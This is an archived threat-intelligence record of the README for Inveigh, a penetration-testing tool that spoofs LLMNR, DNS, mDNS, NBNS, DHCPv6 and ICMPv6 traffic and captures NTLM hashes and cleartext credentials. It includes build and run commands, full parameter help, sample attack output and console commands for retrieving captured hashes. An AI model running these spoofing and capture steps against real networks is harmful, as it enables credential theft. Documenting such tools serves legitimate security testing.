{
	"id": "114cc816-be6b-4e59-bd51-00df51714c5c",
	"created_at": "2026-04-06T00:15:12.159551Z",
	"updated_at": "2026-04-10T03:22:04.178875Z",
	"deleted_at": null,
	"sha1_hash": "03c44ed4462f78a9caae6d203da0f40e17c75fb0",
	"title": "GitHub - Kevin-Robertson/Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 110663,
	"plain_text": "GitHub - Kevin-Robertson/Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers\r\nBy Kevin-Robertson\r\nArchived: 2026-04-05 14:49:48 UTC\r\nInveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. This repo contains\r\nthe primary C# version as well as the legacy PowerShell version.\r\nOverview\r\nInveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific\r\nlisteners/sockets. The packet sniffing method, which was the basis for the original PowerShell version of this tool,\r\nhas the following advantages:\r\nSMB NTLM challenge/response captures over the Window's SMB service\r\nFewer visible port binds on the host system\r\nThe primary disadvantage is the required elevated access.\r\nOn current versions of Windows, the default running UDP services allow port reuse. Therefore, packet sniffing no\r\nlonger provides an advantage for getting around in-use UDP ports. Inveigh's UDP listeners are all configured to\r\ntake advantage of port reuse.\r\nVersion Descriptions\r\nPowerShell Inveigh - original version developed over many years. For now at least, this version (1.506)\r\nwill go without additional updates. Documentation can be found here.\r\nC# Inveigh (aka InveighZero) - original C# POC code combined with a C# port of most of the\r\nPowerShell version's code. This version has now been rebuilt for C# and is taking over as the primary\r\nversion.\r\nFeatures\r\nThe C# version of Inveigh contains attacks for the following protocols:\r\nLLMNR [packet sniffer | listener]\r\nDNS [packet sniffer | listener]\r\nmDNS [packet sniffer | listener]\r\nNBNS [packet sniffer | listener]\r\nDHCPv6 [packet sniffer | listener]\r\nICMPv6 [privileged raw socket]\r\nHTTP [listener]\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 1 of 13\n\nHTTPS [listener]\r\nSMB [packet sniffer | listener]\r\nLDAP [listener]\r\nWebDAV [listener]\r\nProxy Auth [listener]\r\nInveigh works with both IPv4 and IPv6 in cases where support for both is provided by the underlying protocol.\r\nCross-Platform Support\r\nInveigh's SDK style project file is setup for .NET 3.5, 4.6.2, and 6.0 with 6.0 being the version that also works\r\nwith Linux and macOS.\r\n\u003cTargetFrameworks\u003enet35;net62;net6.0\u003c/TargetFrameworks\u003e\r\nKnown Issues\r\nThe packet sniffer is available only on Windows due to differences in the raw socket setups. When\r\ncompiled for either Linux or macOS, the packet sniffer will just be disabled. Instead, Inveigh's SMB\r\nlistener can be used if port 445 is open.\r\nmacOS requires that routes are available for joining multicast groups. In my testing, I've had to add routes\r\nfor DHCPv6 multicast in order to carry out that attack on this platform.\r\nsudo route -nv add -net ff02::1:2 -interface en0\r\nExecution\r\ndotnet Inveigh.dll\r\nLinux/macOS Platform Targeted Builds\r\nWith .NET 6.0 installed on target system\r\ndotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh\r\ndotnet publish -r osx-x64 -f net8.0 -p:AssemblyName=inveigh\r\nWithout .NET 6.0 installed on target system\r\ndotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net8.0 -\r\np:AssemblyName=inveigh\r\ndotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net8.0 -\r\np:AssemblyName=inveigh\r\nUsage\r\nDefault parameter values are located at the beginning of Program.cs. I recommend reviewing and setting\r\neverything to fit your needs before compile. All enable/disable parameters can be set with Y/N values.\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 2 of 13\n\n//begin parameters - set defaults as needed before compile\r\n public static string argCert = \"MIIKaQIBAzCCC...\"\r\n public static string argCertPassword = \"password\";\r\n public static string argChallenge = \"\";\r\n public static string argConsole = \"5\";\r\n public static string argConsoleLimit = \"-1\";\r\n public static string argConsoleStatus = \"0\";\r\n public static string argConsoleUnique = \"Y\";\r\n public static string argDHCPv6 = \"N\";\r\n public static string argDHCPv6TTL = \"30\";\r\n public static string argDNS = \"Y\";\r\n ...\r\n //end parameters\r\nParameter Help\r\n.\\Inveigh.exe -?\r\nControl:\r\n -Inspect Default=Disabled: (Y/N) inspect traffic only.\r\n -IPv4 Default=Enabled: (Y/N) IPv4 spoofing/capture.\r\n -IPv6 Default=Enabled: (Y/N) IPv6 spoofing/capture.\r\n -RunCount Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.\r\n -RunTime Default=Unlimited: Run time duration in minutes.\r\nOutput:\r\n -Console Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, n\r\n -ConsoleLimit Default=Unlimited: Limit to queued console entries.\r\n -ConsoleStatus Default=Disabled: Interval in minutes for auto-displaying capture details.\r\n -ConsoleUnique Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of\r\n -FileDirectory Default=Working Directory: Valid path to an output directory for enabled file output.\r\n -FileOutput Default=Enabled: (Y/N) real time file output.\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 3 of 13\n\n-FilePrefix Default=Inveigh: Prefix for all output files.\r\n -FileUnique Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.\r\n -LogOutput Default=Disabled: (Y/N) outputting log entries.\r\nSpoofers:\r\n -DHCPV6 Default=Disabled: (Y/N) DHCPv6 spoofing.\r\n -DHCPv6TTL Default=300: Lease lifetime in seconds.\r\n -DNS Default=Enabled: (Y/N) DNS spoofing.\r\n -DNSHost Fully qualified hostname to use SOA/SRV responses.\r\n -DNSSRV Default=LDAP: Comma separated list of SRV request services to answer.\r\n -DNSSuffix DNS search suffix to include in DHCPv6/ICMPv6 responses.\r\n -DNSTTL Default=30: DNS TTL in seconds.\r\n -DNSTYPES Default=A: (A, AAAA, SOA, SRV) Comma separated list of DNS types to spoof.\r\n -ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements.\r\n -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.\r\n \r\n -ICMPv6TTL Default=300: ICMPv6 TTL in seconds.\r\n -IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing.\r\n -IgnoreIPs Default=Local: Comma separated list of source IP addresses to ignore when spoofing.\r\n -IgnoreMACs Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.\r\n \r\n -IgnoreQueries Default=None: Comma separated list of name queries to ignore when spoofing.\r\n -Local Default=Disabled: (Y/N) performing spoofing attacks against the host system.\r\n -LLMNR Default=Enabled: (Y/N) LLMNR spoofing.\r\n -LLMNRTTL Default=30: LLMNR TTL in seconds.\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 4 of 13\n\n-MAC Local MAC address for DHCPv6.\r\n -MDNS Default=Enabled: (Y/N) mDNS spoofing.\r\n -MDNSQuestions Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)\r\n -MDNSTTL Default=120: mDNS TTL in seconds.\r\n -MDNSTypes Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)\r\n -MDNSUnicast Default=Enabled: (Y/N) sending a unicast only response to a QM request.\r\n -NBNS Default=Disabled: (Y/N) NBNS spoofing.\r\n -NBNSTTL Default=165: NBNS TTL in seconds.\r\n -NBNSTypes Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)\r\n -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.\r\n -ReplyToIPs Default=All: Comma separated list of source IP addresses to respond to when spoofing.\r\n -ReplyToMACs Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.\r\n \r\n -ReplyToQueries Default=All: Comma separated list of name queries to respond to when spoofing.\r\n -SpooferIP Default=Autoassign: IP address included in spoofing responses.\r\n -SpooferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.\r\n -Repeat Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.\r\nCapture:\r\n -Cert Base64 certificate for TLS.\r\n -CertPassword Base64 certificate password for TLS.\r\n -Challenge Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.\r\n -HTTP Default=Enabled: (Y/N) HTTP listener.\r\n -HTTPAuth Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.\r\n -HTTPPorts Default=80: Comma seperated list of TCP ports for the HTTP listener.\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 5 of 13\n\n-HTTPRealm Default=ADFS: Basic authentication realm.\r\n -HTTPResponse Content to serve as the default HTTP/HTTPS/Proxy response.\r\n -HTTPS Default=Enabled: (Y/N) HTTPS listener.\r\n -HTTPSPorts Default=443: Comma separated list of TCP ports for the HTTPS listener.\r\n -IgnoreAgents Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.\r\n -LDAP Default=Enabled: (Y/N) LDAP listener.\r\n -LDAPPorts Default=389: Comma separated list of TCP ports for the LDAP listener.\r\n -ListenerIP Default=Any: IP address for all listeners.\r\n -ListenerIPv6 Default=Any: IPv6 address for all listeners.\r\n -MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures.\r\n -Proxy Default=Disabled: (Y/N) proxy listener authentication captures.\r\n -ProxyAuth Default=NTLM: (Basic/NTLM) Proxy authentication.\r\n -ProxyPort Default=8492: Port for the proxy listener.\r\n -SMB Default=Enabled: (Y/N) SMB sniffer/listener.\r\n -SMBPorts Default=445: Port for the SMB listener.\r\n -SnifferIP Default=Autoassign: IP address included in spoofing responses.\r\n -SnifferIPv6 Default=Autoassign: IPv6 address included in spoofing responses.\r\n -WebDAV Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.\r\n -WebDAVAuth Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.\r\n -WPADAuth Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)\r\n -WPADResponse Default=Autogenerated: Contents of wpad.dat responses.\r\nDefault (autodetect local IPs)\r\n.\\Inveigh.exe\r\n[*] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588]\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 6 of 13\n\n[+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]\r\n[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]\r\n[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]\r\n[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]\r\n[-] DHCPv6\r\n[+] DNS Packet Sniffer [Type A]\r\n[-] ICMPv6\r\n[+] LLMNR Packet Sniffer [Type A]\r\n[-] MDNS\r\n[-] NBNS\r\n[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]\r\n[-] HTTPS\r\n[+] WebDAV [WebDAVAuth NTLM]\r\n[-] Proxy\r\n[+] LDAP Listener [Port 389]\r\n[+] SMB Packet Sniffer [Port 445]\r\n[+] File Output [C:\\Users\\dev\\source\\repos\\Inveigh\\Inveigh\\bin\\Debug\\net35]\r\n[+] Previous Session Files [Imported]\r\n[*] Press ESC to enter/exit interactive console\r\nListener Only Mode (disabled packet sniffer)\r\n.\\Inveigh.exe -sniffer n\r\n[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368]\r\n[-] Packet Sniffer\r\n[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]\r\n[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]\r\n[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]\r\n[-] DHCPv6\r\n[+] DNS Listener [Type A]\r\n[-] ICMPv6\r\n[+] LLMNR Listener [Type A]\r\n[-] MDNS\r\n[-] NBNS\r\n[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]\r\n[-] HTTPS\r\n[+] WebDAV [WebDAVAuth NTLM]\r\n[-] Proxy\r\n[+] LDAP Listener [Port 389]\r\n[+] SMB Listener [Port 445]\r\n[+] File Output [C:\\Users\\dev\\source\\repos\\InveighZero\\Inveigh\\bin\\Debug\\net35]\r\n[+] Previous Session Files [Imported]\r\n[*] Press ESC to enter/exit interactive console\r\n[!] Failed to start SMB listener on port 445, check IP and port usage.\r\n[!] Failed to start SMB listener on port 445, check IP and port usage.\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 7 of 13\n\nNote, with the packet sniffer disabled, Inveigh will attempt to start SMB listeners for IPv4 and IPv6. On most\r\nwindows systems, port 445 will already be in use. Either ignore error or add -smb n .\r\nDHCPv6\r\nStart DHCPv6 spoofer and IPv6 DNS spoofer. Note, DNS is on by default.\r\n.\\Inveigh.exe -dhcpv6 y\r\n...\r\n[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]\r\n[+] DNS Listener [Type A]\r\n...\r\n[+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent]\r\n[+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16]\r\n[+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent]\r\n[+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16]\r\nStart DHCPv6 spoofer and spoof DNS requests for internal domain only.\r\n.\\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org\r\n...\r\n[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]\r\n[+] DNS Listener [Type A]\r\n...\r\n[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored]\r\n[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent]\r\nStart DHCPv6 spoofer and also send out ICMPv6 RA packets.\r\n.\\Inveigh.exe -dhcpv6 y -icmpv6 y\r\n...\r\n[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]\r\n[+] DNS Listener [Type A]\r\n[+] ICMPv6 Router Advertisement [Interval 200 Seconds]\r\n...\r\n[+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1]\r\nStart DHCPv6 spoofer and answer requests from the local host.\r\n.\\Inveigh.exe -dhcpv6 y -local y\r\n...\r\n[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled]\r\n[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 8 of 13\n\nDNS\r\nSpoof SRV requests in addition to A.\r\n.\\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org\r\n...\r\n[+] DNS Listener [Types A:SRV]\r\n...\r\n[+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [respons\r\nICMPv6\r\nSend ICMPv6 packets to inject a secondary IPv6 DNS server on local subnet systems.\r\n.\\Inveigh.exe -icmpv6 y\r\n...\r\n[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds]\r\n...\r\n[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1]\r\nSend ICMPv6 packets to inject an additional DNS search suffix on local subnet systems.\r\n.\\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net\r\n...\r\n[+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds]\r\n...\r\n[+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1]\r\nLLMNR\r\nSpoof AAAA requests instead of A.\r\n.\\Inveigh.exe -llmnrtypes AAAA\r\n...\r\n[+] LLMNR Listener [Type AAAA]\r\n...\r\n[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored]\r\n[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored]\r\n[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent]\r\n[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent]\r\nmDNS\r\nStart mDNS spoofer and send unicast responses to QM requests.\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 9 of 13\n\n.\\Inveigh.exe -mdns y\r\n...\r\n[+] MDNS Listener [Questions QU:QM | Type A]\r\n...\r\n[+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]\r\n[+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]\r\n[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored]\r\n[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored]\r\nStart mDNS spoofer and send multicast responses to QM requests.\r\n.\\Inveigh.exe -mdns y -mdnsunicast n\r\n...\r\n[+] MDNS Listener [Questions QU:QM | Type A]\r\n...\r\n[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]\r\n[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]\r\nNBNS\r\nStart NBNS spoofer\r\n.\\Inveigh.exe -nbns y\r\n...\r\n[+] NBNS Listener [Types 00:20]\r\n...\r\n[+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent]\r\nHTTP\r\nStart HTTP listener on port 80 (enabled by default)\r\n.\\Inveigh.exe\r\n...\r\n[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]\r\n...\r\nStart HTTP listeners on multiple ports\r\n.\\Inveigh.exe -httpports 80,8080\r\n...\r\n[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080]\r\n...\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 10 of 13\n\nHTTPS\r\nStart HTTPS listener on port 443 with Inveigh's default cert\r\n.\\Inveigh.exe -https y\r\n...\r\n[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443]\r\n...\r\nSMB\r\nStart SMB packet sniffer (enabled by default)\r\n.\\Inveigh.exe\r\n...\r\n[+] SMB Packet Sniffer [Port 445]\r\n...\r\nStart SMB listener on port 445\r\n.\\Inveigh.exe -sniffer n\r\n...\r\n[+] SMB Listener [Port 445]\r\n...\r\nLDAP\r\nStart LDAP listener on port 389\r\n.\\Inveigh.exe\r\n...\r\n[+] LDAP Listener [Port 389]\r\n...\r\nWebDAV\r\nStart the HTTP listener with WebDAV support (enabled by default)\r\n.\\Inveigh.exe\r\n...\r\n[+] WebDAV [WebDAVAuth NTLM]\r\n...\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 11 of 13\n\nProxy Auth\r\nEnable proxy auth capture on port 8492\r\n.\\Inveigh.exe -proxy y\r\n...\r\n[+] Proxy Listener [ProxyAuth NTLM | Port 8492]\r\n...\r\nConsole\r\nInveigh contains a console that is accessible while the tool is running (hit escape to enter and exit). The console\r\nprovides easy access to captured credentials/hashes and other various information. The console's prompt provides\r\nreal-time updates for cleartext, NTLMv1, and NTLMv2 captue counts in the format of unique:total. Note, the\r\nconsole may be inaccessible when running through C2.\r\nInteractive Console Help - enter ? or HELP\r\n=============================================== Inveigh Console Commands ======================================\r\nCommand Description\r\n================================================================================================================\r\nGET CONSOLE | get queued console output\r\nGET DHCPv6Leases | get DHCPv6 assigned IPv6 addresses\r\nGET LOG | get log entries; add search string to filter results\r\nGET NTLMV1 | get captured NTLMv1 hashes; add search string to filter results\r\nGET NTLMV2 | get captured NTLMv2 hashes; add search string to filter results\r\nGET NTLMV1UNIQUE | get one captured NTLMv1 hash per user; add search string to filter results\r\nGET NTLMV2UNIQUE | get one captured NTLMv2 hash per user; add search string to filter results\r\nGET NTLMV1USERNAMES | get usernames and source IPs/hostnames for captured NTLMv1 hashes\r\nGET NTLMV2USERNAMES | get usernames and source IPs/hostnames for captured NTLMv2 hashes\r\nGET CLEARTEXT | get captured cleartext credentials\r\nGET CLEARTEXTUNIQUE | get unique captured cleartext credentials\r\nGET REPLYTODOMAINS | get ReplyToDomains parameter startup values\r\nGET REPLYTOIPS | get ReplyToIPs parameter startup values\r\nGET REPLYTOMACS | get ReplyToMACs parameter startup values\r\nGET REPLYTOQUERIES | get ReplyToQueries parameter startup values\r\nGET IGNOREDOMAINS | get IgnoreDomains parameter startup values\r\nGET IGNOREIPS | get IgnoreIPs parameter startup values\r\nGET IGNOREMACS | get IgnoreMACs parameter startup values\r\nGET IGNOREQUERIES | get IgnoreQueries parameter startup values\r\nSET CONSOLE | set Console parameter value\r\nHISTORY | get command history\r\nRESUME | resume real time console output\r\nSTOP | stop Inveigh\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 12 of 13\n\nInteractive Console Prompt\r\nThe console prompt contains real time capture counts.\r\nC(0:0) NTLMv1(0:0) NTLMv2(0:0)\u003e\r\nCleartext(unique:total) NTLMv1(unique:total) NTLMv2(unique:total)\r\nQuiddity\r\nThe protocol library used by Inveigh is located here.\r\nSpecial Thanks\r\nResponder - https://github.com/lgandx/Responder\r\nImpacket - https://github.com/SecureAuthCorp/impacket\r\nmitm6 - https://github.com/fox-it/mitm6\r\nSource: https://github.com/Kevin-Robertson/Inveigh\r\nhttps://github.com/Kevin-Robertson/Inveigh\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/Kevin-Robertson/Inveigh"
	],
	"report_names": [
		"Inveigh"
	],
	"threat_actors": [],
	"ts_created_at": 1775434512,
	"ts_updated_at": 1775791324,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/03c44ed4462f78a9caae6d203da0f40e17c75fb0.pdf",
		"text": "https://archive.orkl.eu/03c44ed4462f78a9caae6d203da0f40e17c75fb0.txt",
		"img": "https://archive.orkl.eu/03c44ed4462f78a9caae6d203da0f40e17c75fb0.jpg"
	}
}